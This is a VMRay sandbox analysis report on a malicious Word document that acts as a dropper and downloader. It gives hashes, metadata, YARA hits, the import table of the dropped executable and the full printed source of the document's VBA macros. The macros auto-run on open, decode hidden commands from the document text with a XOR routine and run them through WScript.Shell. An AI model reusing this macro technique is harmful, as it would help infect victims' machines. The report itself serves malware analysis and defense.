a14e514d...0b34 | Files
Try VMRay Analyzer
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Dropper, Downloader

a14e514ddfc3a921c5a9e2fc9b931bc734b4927fa9d4b011ab77f9e46da50b34 (SHA256)


Word Document

Created at 2019-02-06 16:40:00

Notifications (1/1)

The overall sleep time of all monitored processes was truncated from "20 seconds" to "10 seconds" to reveal dormant functionality.

Filename Category Type Severity Actions
C:\Users\aETAdzjz\Desktop\Order_Payroll_81154032.doc Sample File Word Document
Mime Type application/msword
File Size 169.00 KB
MD5 5e798794638d40e80c22e539521158ca Copy to Clipboard
SHA1 7b845d0659f80ceb1ebfc85e580c716be3f5eed5 Copy to Clipboard
SHA256 a14e514ddfc3a921c5a9e2fc9b931bc734b4927fa9d4b011ab77f9e46da50b34 Copy to Clipboard
SSDeep 3072:MggRr1xBwqdXNuaIMh8bHpX2z3ZlG0s5Zc4s7qZoajik9QAF6fTLimUVSSUk6:Mg0pxvZQaITpGWzljiU6fvimU Copy to Clipboard
Office Information
Creator Пользователь Windows
Last Modified By Пользователь Windows
Revision 81
Create Time 2019-01-30 16:46:00+00:00
Modify Time 2019-02-06 13:08:00+00:00
Document Information
Codepage Cryllic
Application Microsoft Office Word
App Version 15.0
Template Normal.dotm
Document Security SecurityFlag.NONE
Editing Time 34140.0
Page Count 1
Line Count 10
Paragraph Count 2
Word Count 211
Character Count 1208
Chars With Spaces 1417
Heading Pairs Название
scale_crop False
shared_doc False
VBA Macros (2)
Macro #1: Loi1
Attribute VB_Name = "Loi1"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub autoopen()
Dim slsume As String

    slsume = "adeetrvdf"
    Duren ("Wrst")
End Sub
Macro #2: HHlau
Attribute VB_Name = "HHlau"
Dim lore As Bookmarks
''Priva__te Dec       __lare Function Create--------Process Lib "kernel32" Alias "Crea__________teProcessA" (ByVal lpAppli_---cationName As Str___ing, ByVal lpCommandLine As String, lpProcessAttributes As SECURITY_ATTRIBUTES, lpThreadAttributes As SECURITY_ATTRIBUTES, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long

''   Dec l a re Su           b Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Sub Rhoi()
   sleep 14563
 Rhoi = 128
MsgBox "Zubli12"
End Sub

Sub GetDecStr(ET As String, ByRef CS As String)

Dim i As Integer
    CS = "_______12323==========kdrjgehjrtghjhjGHHGHGFG"
    UpperPart = LowerPart = 0
    For i = 1 To Len(ET) Step 2
        CS = CS + Chr(GetDecChar(ET, i))
            Next i
End Sub

Sub Duren(KL As String)
 Dim fli As String, trm
    'al24 = ActiveDocument.Paragraphs(9).Range
    'MsgBox (al24)
    ''ehui = LOnsh("*", 149)
   '' ohuenobl12.Name
For tyu = 1231 To 21789111 '00000 ''retervd
    why = tyu
  Next tyu
   ''sleep (5000)
   ''Application.Wait (Now + TimeValue("0:00:05"))
   ''MsgBox ("dgt56778sdfrt")
   ''Application.OnTime Now + TimeValue("00:00:03"), "Proc"
   'Wait Time:=Now + TimeSerial(0, 0, 3)
   ''MsgBox ("run")
   If KL = "Wrst" Then ruti (589)
End Sub
Sub ruti(UA As Integer)
    If UA = 589 Then
      jbl__91 = Yobna("V", 186)
         End If
End Sub
Sub Rerid()
End Sub
Private Function GutDicSher65(ByVal ET As String)
Dim MMX_____2 As String
    MMX_____2 = "1243455asdfsdf___+++==s=dfsdfsf$$%%%DEFsfrrefsJHJGHGFHBH1098873545"
Dim i As Integer
Dim DecScr As String
    DecScr = ""
''MsgBox (Len(ET))
    For i = 1 To Len(ET) - 1 Step 2       ''Len(ET)
        DecScr = DecScr + Chr(LOtDicSmal(ET, i))
        ''MsgBox (DecScr)
  Next i
      GutDicSher65 = DecScr
End Function
Private Function LOtDicSmal(ET As String, i As Integer) As Integer       'Even_odd
Dim UP As Integer, LP As Integer
Dim u As Integer
Dim WWW As String
    u = (i + 1) \ 2
    ''If k > 8 Then k = k - 8
   u = u Mod 16
   If u = 0 Then u = 16
    WWW = Asc(Mid(ActiveDocument.Paragraphs(3 + 2 + 1).Range, u, 1))
 UP = GetCorrPart(Asc(Mid(ET, i, 1)))
    LP = GetCorrPart(Asc(Mid(ET, i + 1, 1)))
   LOtDicSmal = JitLohSup(UP, LP, WWW)
End Function
Private Function JitLohSup(ByVal UPart As Integer, ByVal LPart As Integer, ByVal LDR As Integer) As Integer
    JitLohSup = (UPart * (7 + 9) + LPart) Xor LDR
End Function
Private Function GetCorrPart(ByVal Part As Integer) As Integer
Dim tmpPart As Integer
    tmpPart = Part
    If tmpPart >= 48 And tmpPart <= 57 Then
        tmpPart = tmpPart - 48
    ElseIf tmpPart >= 65 And tmpPart <= 70 Then
        tmpPart = tmpPart - 55
    Else: tmpPart = tmpPart - 81 ''55 - 32
    End If
    GetCorrPart = tmpPart
End Function
Private Function Duram(ByVal frau_67 As String, ByVal Von1 As Integer) As Integer
    If Dan56 - 139 = Asc(frau_67) Then
   End If
    If Von1 - 36 - 30 - 41 = Asc(frau_67) + 2 * 0 Then
    '    Ca   ll gruff      f(GetDec_________Str2(Activ___________eDocument.Paragraphs(13).Range) & _
    '        GetDecStr2(ActiveDocument.Paragraphs(24).Range) & _
   '        GetDecStr2(ActiveDocument.Paragraphs(57).Range) & _
        'MsgBox (ActiveDocument.Paragraphs(11).Range)
        'MsgBox (ActiveDocument.Paragraphs(12).Range)
        'MsgBox (ActiveDocument.Paragraphs(13).Range)
    End If
  Duram = 79
End Function

Private Function Yobna(ByVal sukl As String, ByVal Trud As Integer) As Integer
    If Asc(sukl) + 100 = Trud Then
     Set GMO = CreateObject("WScript.Shell")
     ''Set we = ws.Exec(GetDecStr2(Cells(2, 1).Text) + GetDecStr2(Cells(3, 1).Text) + GetDecStr2(Cells(4, 1).Text) + GetDecStr2(Cells(5, 1).Text) + GetDecStr2(Cells(6, 1).Text) + GetDecStr2(Cells(7, 1).Text) + GetDecStr2(Cells(8, 1).Text) + GetDecStr2(Cells(9, 1).Text) + GetDecStr2(Cells(10, 1).Text) + GetDecStr2(Cells(11, 1).Text))
     'we = ws.Run(GetDecStr2(ActiveDocument.Paragraphs(17).Range) & _
''MsgBox ("run")GMO.Run
  ''MsgBox (ActiveDocument.Paragraphs(3 + 2 + 1))
   ''MsgBox (GutDicSher65(ActiveDocument.Paragraphs(3 + 2 + 3).Range))
   Ass = GMO.Run(GutDicSher65(ActiveDocument.Paragraphs(3 + 2 + 3).Range) + GutDicSher65(ActiveDocument.Paragraphs(3 + 2 + 5).Range) & _
   GutDicSher65(ActiveDocument.Paragraphs(3 + 2 + 7).Range) & _
    GutDicSher65(ActiveDocument.Paragraphs(3 + 2 + 8).Range) & GutDicSher65(ActiveDocument.Paragraphs(3 + 2 + 9).Range) & _
        GutDicSher65(ActiveDocument.Paragraphs(3 + 2 + 10).Range) & _
    GutDicSher65(ActiveDocument.Paragraphs(3 + 2 + 11).Range) & GutDicSher65(ActiveDocument.Paragraphs(3 + 2 + 12).Range) + GutDicSher65(ActiveDocument.Paragraphs(3 + 2 + 13).Range), 111)
  End If
End Function

YARA Matches
Rule Name Rule Description Classification Severity Actions
VBA_Execution_Commands VBA macro may execute files or system commands -
VBA_Time_Delay_with_HighVal VBA macro utilizes long time delay functions; possible analysis counter-measure -
VBA_Execution_Commands VBA macro may execute files or system commands -
VBA_Time_Delay_with_HighVal VBA macro utilizes long time delay functions; possible analysis counter-measure -
C:\Users\aETAdzjz\AppData\Roaming\cleanmem\fumezad.exe Created File Unknown
Also Known As c:\users\aetadzjz\appdata\local\temp\tar1111.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cab123a.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\tar123b.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cab2935.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\tar2946.tmp (Created File)
C:\Users\aETAdzjz\AppData\Roaming\cleanmem\fumezad.exe (Created File)
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SSDeep 3:: Copy to Clipboard
File Reputation Information
First Seen 2011-05-27 11:27 (UTC+2)
Last Seen 2017-04-19 12:47 (UTC+2)
c:\users\aetadzjz\appdata\local\temp\tar1111.tmp Created File Stream
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File Reputation Information
First Seen 2017-09-28 06:18 (UTC+2)
Last Seen 2019-01-30 16:29 (UTC+1)
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File Reputation Information
First Seen 2017-09-26 19:08 (UTC+2)
Last Seen 2019-01-30 16:36 (UTC+1)
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First Seen 2018-11-29 09:08 (UTC+1)
Last Seen 2018-12-13 12:46 (UTC+1)
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File Reputation Information
First Seen 2018-11-28 09:11 (UTC+1)
Last Seen 2019-01-24 10:30 (UTC+1)
c:\users\aetadzjz\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015 Modified File Stream
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File Size 0.33 KB
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MD5 a748a4e6151f6d75cf93b2f899df23df Copy to Clipboard
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Parser Error Remark Static analyzer was unable to completely parse the analyzed file
PE Information
Image Base 0x400000
Entry Point 0x40bb34
Size Of Code 0x10c00
Size Of Initialized Data 0x66e00
File Type executable
Subsystem windows_gui
Machine Type i386
Compile Timestamp 2019-02-06 13:55:57+00:00
Sections (4)
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x401000 0x10a6a 0x10c00 0x400 cnt_code, mem_execute, mem_read 6.27
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Imports (2)
USER32.dll (83)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
DrawIconEx 0x0 0x4122d8 0x592f8 0x582f8 0xc8
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ShowWindow 0x0 0x4123f0 0x59410 0x58410 0x2df
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SetWindowRgn 0x0 0x4123f8 0x59418 0x58418 0x2c7
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keybd_event 0x0 0x412408 0x59428 0x58428 0x330
GetForegroundWindow 0x0 0x41240c 0x5942c 0x5842c 0x12d
GetWindowThreadProcessId 0x0 0x412410 0x59430 0x58430 0x1a4
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SetFocus 0x0 0x41241c 0x5943c 0x5843c 0x292
MonitorFromPoint 0x0 0x412420 0x59440 0x58440 0x218
KERNEL32.dll (181)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GetFullPathNameW 0x0 0x412000 0x59020 0x58020 0x1fb
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RtlUnwind 0x0 0x412008 0x59028 0x58028 0x418
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GetTickCount64 0x0 0x41201c 0x5903c 0x5803c 0x294
InitOnceExecuteOnce 0x0 0x412020 0x59040 0x58040 0x2df
InitializeCriticalSectionAndSpinCount 0x0 0x412024 0x59044 0x58044 0x2e3
GetModuleHandleExW 0x0 0x412028 0x59048 0x58048 0x217
InterlockedDecrement 0x0 0x41202c 0x5904c 0x5804c 0x2eb
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DecodePointer 0x0 0x412034 0x59054 0x58054 0xca
EncodePointer 0x0 0x412038 0x59058 0x58058 0xea
IsDebuggerPresent 0x0 0x41203c 0x5905c 0x5805c 0x300
GetCommandLineA 0x0 0x412040 0x59060 0x58060 0x186
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MoveFileW 0x0 0x412048 0x59068 0x58068 0x363
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GetStdHandle 0x0 0x412060 0x59080 0x58080 0x264
GetLogicalDriveStringsW 0x0 0x412064 0x59084 0x58084 0x208
EnterCriticalSection 0x0 0x412068 0x59088 0x58088 0xee
ResumeThread 0x0 0x41206c 0x5908c 0x5808c 0x413
OpenEventA 0x0 0x412070 0x59090 0x58090 0x374
CreateSemaphoreA 0x0 0x412074 0x59094 0x58094 0xab
CancelIo 0x0 0x412078 0x59098 0x58098 0x42
DisconnectNamedPipe 0x0 0x41207c 0x5909c 0x5809c 0xe1
GetOverlappedResult 0x0 0x412080 0x590a0 0x580a0 0x238
CreateNamedPipeW 0x0 0x412084 0x590a4 0x580a4 0xa0
ConnectNamedPipe 0x0 0x412088 0x590a8 0x580a8 0x65
SetNamedPipeHandleState 0x0 0x41208c 0x590ac 0x580ac 0x47c
PeekNamedPipe 0x0 0x412090 0x590b0 0x580b0 0x38d
LeaveCriticalSection 0x0 0x412094 0x590b4 0x580b4 0x339
LoadResource 0x0 0x412098 0x590b8 0x580b8 0x341
FindResourceW 0x0 0x41209c 0x590bc 0x580bc 0x14e
SizeofResource 0x0 0x4120a0 0x590c0 0x580c0 0x4b1
MulDiv 0x0 0x4120a4 0x590c4 0x580c4 0x366
GetLastError 0x0 0x4120a8 0x590c8 0x580c8 0x202
GlobalFree 0x0 0x4120ac 0x590cc 0x580cc 0x2ba
GlobalUnlock 0x0 0x4120b0 0x590d0 0x580d0 0x2c5
GlobalLock 0x0 0x4120b4 0x590d4 0x580d4 0x2be
GlobalAlloc 0x0 0x4120b8 0x590d8 0x580d8 0x2b3
GetCurrentThreadId 0x0 0x4120bc 0x590dc 0x580dc 0x1c5
CloseHandle 0x0 0x4120c0 0x590e0 0x580e0 0x52
WaitForSingleObject 0x0 0x4120c4 0x590e4 0x580e4 0x4f9
CreateEventW 0x0 0x4120c8 0x590e8 0x580e8 0x85
OpenProcess 0x0 0x4120cc 0x590ec 0x580ec 0x380
lstrcmpiA 0x0 0x4120d0 0x590f0 0x580f0 0x544
lstrcmpA 0x0 0x4120d4 0x590f4 0x580f4 0x541
SetEnvironmentVariableA 0x0 0x4120d8 0x590f8 0x580f8 0x456
CompareStringW 0x0 0x4120dc 0x590fc 0x580fc 0x64
SetStdHandle 0x0 0x4120e0 0x59100 0x58100 0x487
WriteConsoleW 0x0 0x4120e4 0x59104 0x58104 0x524
WriteConsoleA 0x0 0x4120e8 0x59108 0x58108 0x51a
ExpandEnvironmentStringsW 0x0 0x4120ec 0x5910c 0x5810c 0x11d
GetLocaleInfoA 0x0 0x4120f0 0x59110 0x58110 0x204
FlushFileBuffers 0x0 0x4120f4 0x59114 0x58114 0x157
GetConsoleMode 0x0 0x4120f8 0x59118 0x58118 0x1ac
GetConsoleCP 0x0 0x4120fc 0x5911c 0x5811c 0x19a
GetStringTypeA 0x0 0x412100 0x59120 0x58120 0x266
QueryPerformanceCounter 0x0 0x412104 0x59124 0x58124 0x3a7
GetFileType 0x0 0x412108 0x59128 0x58128 0x1f3
SetHandleCount 0x0 0x41210c 0x5912c 0x5812c 0x46f
GetEnvironmentStringsW 0x0 0x412110 0x59130 0x58130 0x1da
FreeEnvironmentStringsW 0x0 0x412114 0x59134 0x58134 0x161
GetDateFormatA 0x0 0x412118 0x59138 0x58138 0x1c6
GetTimeFormatA 0x0 0x41211c 0x5913c 0x5813c 0x295
GetProcAddress 0x0 0x412120 0x59140 0x58140 0x245
GetModuleHandleA 0x0 0x412124 0x59144 0x58144 0x215
GetSystemDirectoryW 0x0 0x412128 0x59148 0x58148 0x270
FlushInstructionCache 0x0 0x41212c 0x5914c 0x5814c 0x158
DeleteFileW 0x0 0x412130 0x59150 0x58150 0xd6
GlobalReAlloc 0x0 0x412134 0x59154 0x58154 0x2c1
LoadLibraryA 0x0 0x412138 0x59158 0x58158 0x33c
QueryDosDeviceW 0x0 0x41213c 0x5915c 0x5815c 0x3a0
RaiseException 0x0 0x412140 0x59160 0x58160 0x3b1
GetExitCodeProcess 0x0 0x412144 0x59164 0x58164 0x1df
GetModuleHandleW 0x0 0x412148 0x59168 0x58168 0x218
GetVersionExW 0x0 0x41214c 0x5916c 0x5816c 0x2a4
FindResourceExW 0x0 0x412150 0x59170 0x58170 0x14d
MultiByteToWideChar 0x0 0x412154 0x59174 0x58174 0x367
GetVersion 0x0 0x412158 0x59178 0x58178 0x2a2
GetCurrentProcess 0x0 0x41215c 0x5917c 0x5817c 0x1c0
LocalFree 0x0 0x412160 0x59180 0x58180 0x348
GetModuleFileNameW 0x0 0x412164 0x59184 0x58184 0x214
FreeConsole 0x0 0x412168 0x59188 0x58188 0x15f
GetCurrentProcessId 0x0 0x41216c 0x5918c 0x5818c 0x1c1
CreateRemoteThread 0x0 0x412170 0x59190 0x58190 0xa9
CreateMutexW 0x0 0x412174 0x59194 0x58194 0x9e
Sleep 0x0 0x412178 0x59198 0x58198 0x4b2
LoadLibraryW 0x0 0x41217c 0x5919c 0x5819c 0x33f
ReadFile 0x0 0x412180 0x591a0 0x581a0 0x3c0
CreateFileW 0x0 0x412184 0x591a4 0x581a4 0x8f
LocalAlloc 0x0 0x412188 0x591a8 0x581a8 0x344
InitializeCriticalSection 0x0 0x41218c 0x591ac 0x581ac 0x2e2
FreeLibrary 0x0 0x412190 0x591b0 0x581b0 0x162
DeleteCriticalSection 0x0 0x412194 0x591b4 0x581b4 0xd1
GetDriveTypeW 0x0 0x412198 0x591b8 0x581b8 0x1d3
CreateDirectoryW 0x0 0x41219c 0x591bc 0x581bc 0x81
CreateProcessW 0x0 0x4121a0 0x591c0 0x581c0 0xa8
SetLastError 0x0 0x4121a4 0x591c4 0x581c4 0x473
GetWindowsDirectoryW 0x0 0x4121a8 0x591c8 0x581c8 0x2af
WideCharToMultiByte 0x0 0x4121ac 0x591cc 0x581cc 0x511
GetTickCount 0x0 0x4121b0 0x591d0 0x581d0 0x293
GetTempPathW 0x0 0x4121b4 0x591d4 0x581d4 0x285
GetTimeZoneInformation 0x0 0x4121b8 0x591d8 0x581d8 0x298
GetSystemInfo 0x0 0x4121bc 0x591dc 0x581dc 0x273
GetPrivateProfileStringW 0x0 0x4121c0 0x591e0 0x581e0 0x242
GetSystemTimeAsFileTime 0x0 0x4121c4 0x591e4 0x581e4 0x279
GetDiskFreeSpaceExW 0x0 0x4121c8 0x591e8 0x581e8 0x1ce
GetFileSize 0x0 0x4121cc 0x591ec 0x581ec 0x1f0
GetUserDefaultUILanguage 0x0 0x4121d0 0x591f0 0x581f0 0x29e
GetTempFileNameW 0x0 0x4121d4 0x591f4 0x581f4 0x283
CopyFileW 0x0 0x4121d8 0x591f8 0x581f8 0x75
WriteFile 0x0 0x4121dc 0x591fc 0x581fc 0x525
lstrcpyW 0x0 0x4121e0 0x59200 0x58200 0x548
GetFileAttributesW 0x0 0x4121e4 0x59204 0x58204 0x1ea
MoveFileExW 0x0 0x4121e8 0x59208 0x58208 0x360
DeviceIoControl 0x0 0x4121ec 0x5920c 0x5820c 0xdd
FindNextFileW 0x0 0x4121f0 0x59210 0x58210 0x145
lstrcmpiW 0x0 0x4121f4 0x59214 0x58214 0x545
GetLocaleInfoW 0x0 0x4121f8 0x59218 0x58218 0x206
lstrcmpW 0x0 0x4121fc 0x5921c 0x5821c 0x542
LoadLibraryExW 0x0 0x412200 0x59220 0x58220 0x33e
GetACP 0x0 0x412204 0x59224 0x58224 0x168
SetEvent 0x0 0x412208 0x59228 0x58228 0x459
ExitProcess 0x0 0x41220c 0x5922c 0x5822c 0x119
CreateThread 0x0 0x412210 0x59230 0x58230 0xb5
GetModuleFileNameA 0x0 0x412214 0x59234 0x58234 0x213
TerminateThread 0x0 0x412218 0x59238 0x58238 0x4c1
GlobalFindAtomW 0x0 0x41221c 0x5923c 0x5823c 0x2b7
TerminateProcess 0x0 0x412220 0x59240 0x58240 0x4c0
OpenMutexW 0x0 0x412224 0x59244 0x58244 0x37d
SetErrorMode 0x0 0x412228 0x59248 0x58248 0x458
GetSystemTime 0x0 0x41222c 0x5924c 0x5824c 0x277
SystemTimeToFileTime 0x0 0x412230 0x59250 0x58250 0x4bd
WaitForMultipleObjects 0x0 0x412234 0x59254 0x58254 0x4f7
ResetEvent 0x0 0x412238 0x59258 0x58258 0x40f
CreateEventA 0x0 0x41223c 0x5925c 0x5825c 0x82
GetSystemWindowsDirectoryW 0x0 0x412240 0x59260 0x58260 0x27c
GetVolumeInformationW 0x0 0x412244 0x59264 0x58264 0x2a7
VirtualFree 0x0 0x412248 0x59268 0x58268 0x4ec
VirtualAlloc 0x0 0x41224c 0x5926c 0x5826c 0x4e9
ReleaseSemaphore 0x0 0x412250 0x59270 0x58270 0x3fe
HeapFree 0x0 0x412254 0x59274 0x58274 0x2cf
GetProcessHeap 0x0 0x412258 0x59278 0x58278 0x24a
HeapAlloc 0x0 0x41225c 0x5927c 0x5827c 0x2cb
IsProcessorFeaturePresent 0x0 0x412260 0x59280 0x58280 0x304
HeapDestroy 0x0 0x412264 0x59284 0x58284 0x2ce
HeapReAlloc 0x0 0x412268 0x59288 0x58288 0x2d2
HeapSize 0x0 0x41226c 0x5928c 0x5828c 0x2d4
LocalFileTimeToFileTime 0x0 0x412270 0x59290 0x58290 0x346
SetFilePointerEx 0x0 0x412274 0x59294 0x58294 0x467
GetFileSizeEx 0x0 0x412278 0x59298 0x58298 0x1f1
OutputDebugStringW 0x0 0x41227c 0x5929c 0x5829c 0x38a
FormatMessageW 0x0 0x412280 0x592a0 0x582a0 0x15e
TlsGetValue 0x0 0x412284 0x592a4 0x582a4 0x4c7
TlsSetValue 0x0 0x412288 0x592a8 0x582a8 0x4c8
GetAtomNameW 0x0 0x41228c 0x592ac 0x582ac 0x16e
OpenThread 0x0 0x412290 0x592b0 0x582b0 0x385
AddAtomW 0x0 0x412294 0x592b4 0x582b4 0x4
TlsAlloc 0x0 0x412298 0x592b8 0x582b8 0x4c5
FindAtomW 0x0 0x41229c 0x592bc 0x582bc 0x12d
DeleteAtom 0x0 0x4122a0 0x592c0 0x582c0 0xcf
TlsFree 0x0 0x4122a4 0x592c4 0x582c4 0x4c6
UnhandledExceptionFilter 0x0 0x4122a8 0x592c8 0x582c8 0x4d3
SetUnhandledExceptionFilter 0x0 0x4122ac 0x592cc 0x582cc 0x4a5
GlobalMemoryStatusEx 0x0 0x4122b0 0x592d0 0x582d0 0x2c0
GetStartupInfoW 0x0 0x4122b4 0x592d4 0x582d4 0x263
GetCPInfo 0x0 0x4122b8 0x592d8 0x582d8 0x172
LCMapStringA 0x0 0x4122bc 0x592dc 0x582dc 0x32b
LCMapStringW 0x0 0x4122c0 0x592e0 0x582e0 0x32d
GetStringTypeW 0x0 0x4122c4 0x592e4 0x582e4 0x269
HeapCreate 0x0 0x4122c8 0x592e8 0x582e8 0x2cd
GetOEMCP 0x0 0x4122cc 0x592ec 0x582ec 0x237
IsValidCodePage 0x0 0x4122d0 0x592f0 0x582f0 0x30a
Digital Signatures (1)
Certificate: G Data Internet Security
Issued by G Data Internet Security
Country Name -
Valid From 2019-02-06 13:56:58+00:00
Valid Until 2039-12-31 23:59:59+00:00
Algorithm sha512_rsa
Serial Number -7 98 95 FC 32 3E 03 65 B8 2F B5 38 6A 56 90 72
Thumbprint 93 EF 47 2D 18 5A 41 41 BE D7 B1 68 44 E1 F2 A7 AA 0E 1B A6
Function Logfile

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
